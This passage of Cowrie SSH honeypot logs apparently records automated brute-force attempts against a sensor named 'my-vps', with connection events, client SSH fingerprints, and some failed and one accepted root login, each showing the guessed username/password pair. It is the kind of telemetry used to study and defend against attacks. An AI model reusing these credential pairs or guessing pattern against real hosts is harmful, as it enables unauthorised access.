.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T04:13:13.943989Z","src_ip":"212.227.235.229","session":"c9073f166b55"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37830,"dst_ip":"1.2.3.4","dst_port":22,"session":"6010a4d3af75","protocol":"ssh","message":"New connection: 212.227.235.229:37830 (1.2.3.4:22) [session: 6010a4d3af75]","sensor":"my-vps","timestamp":"2025-08-26T04:13:14.304443Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T04:13:14.547815Z","src_ip":"212.227.235.229","session":"6010a4d3af75"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T04:13:14.567902Z","src_ip":"212.227.235.229","session":"6010a4d3af75"}
{"eventid":"cowrie.login.failed","username":"db2inst2","password":"db2inst2","message":"login attempt [db2inst2/db2inst2] failed","sensor":"my-vps","timestamp":"2025-08-26T04:13:16.062787Z","src_ip":"212.227.235.229","session":"6010a4d3af75"}
{"eventid":"cowrie.session.connect","src_ip":"45.88.8.186","src_port":44630,"dst_ip":"1.2.3.4","dst_port":22,"session":"01612ab5fbf8","protocol":"ssh","message":"New connection: 45.88.8.186:44630 (1.2.3.4:22) [session: 01612ab5fbf8]","sensor":"my-vps","timestamp":"2025-08-26T04:13:17.274838Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T04:13:17.830391Z","src_ip":"45.88.8.186","session":"01612ab5fbf8"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T04:13:17.831073Z","src_ip":"45.88.8.186","session":"01612ab5fbf8"}
{"eventid":"cowrie.session.closed","duration":"3.9","message":"Connection lost after 3.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:13:18.175559Z","src_ip":"212.227.235.229","session":"6010a4d3af75"}
{"eventid":"cowrie.login.failed","username":"carol","password":"carol","message":"login attempt [carol/carol] failed","sensor":"my-vps","timestamp":"2025-08-26T04:13:19.530499Z","src_ip":"212.227.235.229","session":"c9073f166b55"}
{"eventid":"cowrie.login.success","username":"root","password":"balakirev","message":"login attempt [root/balakirev] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:13:20.159776Z","src_ip":"45.88.8.186","session":"01612ab5fbf8"}
{"eventid":"cowrie.session.closed","duration":"7.1","message":"Connection lost after 7.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:13:20.808107Z","src_ip":"212.227.235.229","session":"c9073f166b55"}
{"eventid":"cowrie.session.closed","duration":"3.5","message":"Connection lost after 3.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:13:20.809094Z","src_ip":"45.88.8.186","session":"01612ab5fbf8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39998,"dst_ip":"1.2.3.4","dst_port":22,"session":"33d629237279","protocol":"ssh","message":"New connection: 212.227.235.229:39998 (1.2.3.4:22) [session: 33d629237279]","sensor":"my-vps","timestamp":"2025-08-26T04:13:26.227943Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T04:13:26.228831Z","src_ip":"212.227.235.229","session":"33d629237279"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T04:13:27.317016Z","src_ip":"212.227.235.229","session":"33d629237279"}
{"eventid":"cowrie.login.failed","username":"admin","password":"administrator","message":"login attempt [admin/administrator] failed","sensor":"my-vps","timestamp":"2025-08-26T04:13:31.784485Z","src_ip":"212.227.235.229","session":"33d629237279"}
{"eventid":"cowrie.session.closed","duration":"6.9","message":"Connection lost after 6.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:13:33.145296Z","src_ip":"212.227.235.229","session":"33d629237279"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59332,"dst_ip":"1.2.3.4","dst_port":22,"session":"51d0196dc15f","protocol":"ssh","message":"New connection: 212.227.235.229:59332 (1.2.3.4:22) [session: 51d0196dc15f]","sensor":"my-vps","timestamp":"2025-08-26T04:13:33.772731Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T04:13:33.878905Z","src_ip":"212.227.235.229","session":"51d0196dc15f"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T04:13:34.046682Z","src_ip":"212.227.235.229","session":"51d0196dc15f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60796,"dst_ip":"1.2.3.4","dst_port":22,"session":"36ad7d8dd82a","protocol":"ssh","message":"New connection: 212.227.235.229:60796 (1.2.3.4:22) [session: 36ad7d8dd82a]","sensor":"my-vps","timestamp":"2025-08-26T04:13:34.808439Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T04:13:35.052190Z","src_ip":"212.227.235.229","session":"36ad7d8dd82a"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T04:13:35.144425Z","src_ip":"212.227.235.229","session":"36ad7d8dd82a"}
{"eventid":"cowrie.login.failed","username":"sergey","password":"sergey","message":"login attempt [sergey/sergey] failed","sensor":"my-vps","timestamp":"2025-08-26T04:13:35.706239Z","src_ip":"212.227.235.229","session":"51d0196dc15f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60808,"dst_ip":"1.2.3.4","dst_port":22,"session":"4e3071515f84","protocol":"ssh","message":"New connection: 212.227.235.229:60808 (1.2.3.4:22) [session: 4e3071515f84]","sensor":"my-vps","timestamp":"2025-08-26T04:13:36.652125Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T04:13:36.846497Z","src_ip":"212.227.235.229","session":"4e3071515f84"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T04:13:36.968663Z","src_ip":"212.227.235.229","session":"4e3071515f84"}
{"eventid":"cowrie.session.closed","duration":"3.2","message":"Connection lost after 3.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:13:36.970301Z","src_ip":"212.227.235.229","session":"51d0196dc15f"}
{"eventid":"cowrie.login.failed","username":"developer","password":"developer","message":"login attempt [developer/developer] failed","sensor":"my-vps","timestamp":"2025-08-26T04:13:37.530580Z","src_ip":"212.227.235.229","session":"36ad7d8dd82a"}
{"eventid":"cowrie.login.failed","username":"user100","password":"user100","message":"login attempt [user100/user100] failed","sensor":"my-vps","timestamp":"2025-08-26T04:13:38.977573Z","src_ip":"212.227.235.229","session":"4e3071515f84"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57630,"dst_ip":"1.2.3.4","dst_port":22,"session":"c98cd4208356","protocol":"ssh","message":"New connection: 212.227.235.229:57630 (1.2.3.4:22) [session: c98cd4208356]","sensor":"my-vps","timestamp":"2025-08-26T04:13:39.169087Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T04:13:39.170624Z","src_ip":"212.227.235.229","session":"c98cd4208356"}
{"eventid":"cowrie.session.closed","duration":"4.7","message":"Connection lost after 4.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:13:39.467624Z","src_ip":"212.227.235.229","session":"36ad7d8dd82a"}
